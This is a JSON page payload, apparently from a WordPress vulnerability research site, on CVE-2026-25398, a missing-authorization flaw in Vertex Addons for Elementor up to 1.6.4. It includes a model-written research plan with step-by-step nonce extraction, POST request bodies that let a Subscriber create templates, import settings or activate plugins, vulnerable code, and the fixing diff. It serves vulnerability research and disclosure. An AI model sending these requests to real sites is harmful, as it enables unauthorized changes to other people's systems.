[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fLDAKUEVGV--hVMBI66pq4iyBHFP5hDaGEC7GzY11KGM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-25398","vertex-addons-for-elementor-missing-authorization","Vertex Addons for Elementor \u003C= 1.6.4 - Missing Authorization","The Vertex Addons for Elementor plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.","addons-for-elementor-builder",null,"\u003C=1.6.4","1.7.0","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-23 00:00:00","2026-04-02 15:08:58",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd04e87f3-351c-4352-a6f1-69c652baa992?source=api-prod",11,[22,23,24,25,26,27,28,29],"addons-for-elementor-builder.php","afeb.php","app\u002FAjax.php","app\u002FAssets.php","assets\u002Fjs\u002Fglobal\u002Fcomponent.js","assets\u002Fjs\u002Fglobal\u002Fcomponent.min.js","html\u002Fadmin\u002Fmenus\u002Fdashboard\u002Ffragments\u002Fcontent\u002Fdashboard\u002Ftpl.php","readme.txt","researched",false,3,"# Research Plan: Missing Authorization in Vertex Addons for Elementor (CVE-2026-25398)\n\n## 1. Vulnerability Summary\nThe **Vertex Addons for Elementor** plugin (up to 1.6.4) is vulnerable to missing authorization. Specifically, the functions `create_template` and `create_popup` in the `AFEB\\Ajax` class fail to perform capability checks (e.g., `current_user_can('edit_posts')`). \n\nWhile these functions verify a WordPress nonce (`afeb_ajax_nonce`), this nonce is enqueued in the WordPress admin dashboard for all logged-in users, including those with **Subscriber** roles. Consequently, a Subscriber can create arbitrary Elementor templates and popups, leading to unauthorized data modification (Integrity: Low).\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `afeb_create_template` or `afeb_create_popup`\n- **Authentication**: Authenticated (Subscriber-level or higher).\n- **Vulnerable Parameters**: \n - `data[type]` (Template type: header, footer, single, archive, or dynamic-loop-item)\n - `data[name]` (Post title)\n- **Preconditions**: The attacker must be logged in to WordPress to obtain the valid admin nonce.\n\n## 3. Code Flow\n1. **Hook Registration**: `app\u002Fafeb.php` initializes the `AFEB\\Ajax` class via `(new Ajax())->init()`.\n2. **Action Mapping**: `app\u002FAjax.php` in `actions()` registers the AJAX handlers:\n ```php\n add_action('wp_ajax_afeb_create_template', [$this, 'create_template']);\n add_action('wp_ajax_afeb_create_popup', [$this, 'create_popup']);\n ```\n3. **Trigger**: An authenticated user sends a POST request with `action=afeb_create_template`.\n4. **Vulnerable Function**: `Ajax::create_template()` is called:\n - It verifies the nonce: `check_ajax_referer('afeb_ajax_nonce', 'nonce');`\n - It fails to check user capabilities.\n - It calls `wp_insert_post()` to create a post of type `AFEB\\PostTypes\\Builder::BUILDER_POST_TYPE`.\n - It updates post meta using `update_post_meta($id, '_afeb_document_type', $type);`.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is localized for the WordPress admin backend. Any logged-in user can access `\u002Fwp-admin\u002Fprofile.php`, where the plugin's backend scripts are enqueued.\n\n1. **Navigate**: Use the browser to go to `\u002Fwp-admin\u002Fprofile.php`.\n2. **Find Script**: The `app\u002FAssets.php` file registers `afeb-backend-script`. The nonce is likely part of a localized object.\n3. **Extract**: Use `browser_eval` to find the nonce. The object name is likely `afeb_backend_params` or `afeb_params` (based on naming conventions in `Assets.php`).\n - `browser_eval(\"window.afeb_backend_params?.nonce\")`\n - Alternatively, search the HTML source for the string `\"afeb_ajax_nonce\"`.\n\n## 5. Exploitation Strategy\n### Create an Elementor Template\n- **Method**: POST\n- **URL**: `http:\u002F\u002FTARGET\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n ```\n action=afeb_create_template&nonce=[EXTRACTED_NONCE]&data[type]=header&data[name]=VulnerablePost\n ```\n\n### Create an Elementor Popup\n- **Method**: POST\n- **URL**: `http:\u002F\u002FTARGET\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n ```\n action=afeb_create_popup&nonce=[EXTRACTED_NONCE]&data[name]=VulnerablePopup\n ```\n\n## 6. Test Data Setup\n1. **Target Version**: Ensure plugin version 1.6.4 is installed and active.\n2. **User Creation**: Create a user with the `subscriber` role.\n - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n3. **Dependencies**: Ensure **Elementor** is installed and active, as the plugin requires it to initialize the AJAX class.\n\n## 7. Expected Results\n- The server should respond with a JSON success message: `{\"success\":true,\"data\":{\"redirect\":\"...\",\"message\":\"The new template has been created\"}}`.\n- A new post should be created in the database.\n\n## 8. Verification Steps\n1. **Check Posts**: Use WP-CLI to check for the newly created post type.\n - For templates: `wp post list --post_type=afeb_builder --field=post_title` (Note: `afeb_builder` is the inferred slug for `Builder::BUILDER_POST_TYPE`).\n - For popups: `wp post list --post_type=afeb_popup --field=post_title` (Note: `afeb_popup` is the inferred slug for `Popup::POPUP_POST_TYPE`).\n2. **Verify Meta**: Confirm the template type was set correctly.\n - `wp post meta list [NEW_POST_ID]`\n\n## 9. Alternative Approaches\nIf `afeb_create_template` fails due to strict post-type checks, attempt `afeb_activate_required_plugins` or `afeb_import_settings` which are also registered in `Ajax::actions()` and appear to lack capability checks.\n\n- **Import Settings Exploit**:\n ```\n action=afeb_import_settings&nonce=[NONCE]&data=[BASE64_SETTINGS]\n ```\n- **Required Plugins Exploit**:\n ```\n action=afeb_activate_required_plugins&nonce=[NONCE]&data[slug]=any-plugin-slug\n ```","The Vertex Addons for Elementor plugin for WordPress (up to version 1.6.4) fails to implement proper authorization checks on several AJAX functions, including those for template creation, plugin activation, and settings imports. While these functions use nonces for CSRF protection, the nonce is available to any authenticated user, allowing low-privileged attackers like Subscribers to perform unauthorized administrative actions.","\u002F\u002F app\u002FAjax.php line 54\nadd_action('wp_ajax_afeb_create_template', [$this, 'create_template']);\nadd_action('wp_ajax_afeb_create_popup', [$this, 'create_popup']);\nadd_action('wp_ajax_afeb_activate_required_plugins', [$this, 'activate_required_plugins']);\nadd_action('wp_ajax_afeb_import_templates_kit', [$this, 'import_templates_kit']);\nadd_action('wp_ajax_afeb_import_settings', [$this, 'import_settings']);\n\n---\n\n\u002F\u002F app\u002FAjax.php line 122\npublic function create_template()\n{\n check_ajax_referer('afeb_ajax_nonce', 'nonce');\n\n $type = isset($_POST['data']['type']) ? sanitize_text_field(wp_unslash($_POST['data']['type'])) : '';\n \u002F\u002F ... (missing capability check before wp_insert_post)\n\n---\n\n\u002F\u002F app\u002FAjax.php line 211\npublic function create_popup()\n{\n check_ajax_referer('afeb_ajax_nonce', 'nonce');\n\n $name = isset($_POST['data']['name']) ? sanitize_text_field(wp_unslash($_POST['data']['name'])) : '';\n \u002F\u002F ... (missing capability check before wp_insert_post)","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Faddons-for-elementor-builder\u002F1.6.4\u002Fapp\u002FAjax.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Faddons-for-elementor-builder\u002F1.7.0\u002Fapp\u002FAjax.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Faddons-for-elementor-builder\u002F1.6.4\u002Fapp\u002FAjax.php\t2026-02-28 04:34:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Faddons-for-elementor-builder\u002F1.7.0\u002Fapp\u002FAjax.php\t2026-03-25 18:05:28.000000000 +0000\n@@ -224,10 +224,14 @@\n {\n check_ajax_referer('afeb_ajax_nonce', 'nonce');\n \n- $error = '';\n-\n if (!current_user_can('install_plugins'))\n- $error = esc_html__('Sorry, you are not allowed to install plugins on this site.', 'addons-for-elementor-builder');\n+ {\n+ wp_send_json_error([\n+ 'message' => esc_html__('Sorry, you are not allowed to install plugins on this site.', 'addons-for-elementor-builder'),\n+ ], 403);\n+ }\n+\n+ $error = '';\n \n $plugins = isset($_POST['plugins']) ? map_deep($_POST['plugins'], 'sanitize_text_field') : [];\n $time_limit = ini_get('max_execution_time');\n@@ -294,6 +298,13 @@\n {\n check_ajax_referer('afeb_ajax_nonce', 'nonce');\n \n+ if (!current_user_can('manage_options'))\n+ {\n+ wp_send_json_error([\n+ 'message' => esc_html__('Sorry, you are not allowed to import template kit settings on this site.', 'addons-for-elementor-builder'),\n+ ], 403);\n+ }\n+\n $time_limit = ini_get('max_execution_time');\n \n if (!did_action('elementor\u002Floaded') || !class_exists(Plugin::class))\n@@ -386,6 +397,13 @@\n {\n check_ajax_referer('afeb_ajax_nonce', 'nonce');\n \n+ if (!current_user_can('manage_options'))\n+ {\n+ wp_send_json_error([\n+ 'message' => esc_html__('Sorry, you are not allowed to import template kits on this site.', 'addons-for-elementor-builder'),\n+ ], 403);\n+ }\n+\n $args = [","1. Login to the WordPress site as a Subscriber-level user.\n2. Access the WordPress admin dashboard (e.g., \u002Fwp-admin\u002Fprofile.php) to obtain the plugin's localized AJAX nonce, 'afeb_ajax_nonce'.\n3. Construct an AJAX request targeting 'admin-ajax.php'.\n4. Set the 'action' parameter to a vulnerable handler such as 'afeb_create_template' or 'afeb_import_settings'.\n5. Include the extracted nonce in the 'nonce' parameter.\n6. Provide payload parameters (e.g., 'data[type]=header&data[name]=MaliciousTemplate') to create new site components or modify settings without having the required administrative permissions.","gemini-3-flash-preview","2026-04-18 00:15:25","2026-04-18 00:15:48",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.6.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddons-for-elementor-builder\u002Ftags\u002F1.6.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Faddons-for-elementor-builder.1.6.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddons-for-elementor-builder\u002Ftags\u002F1.7.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Faddons-for-elementor-builder.1.7.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddons-for-elementor-builder\u002Ftags"]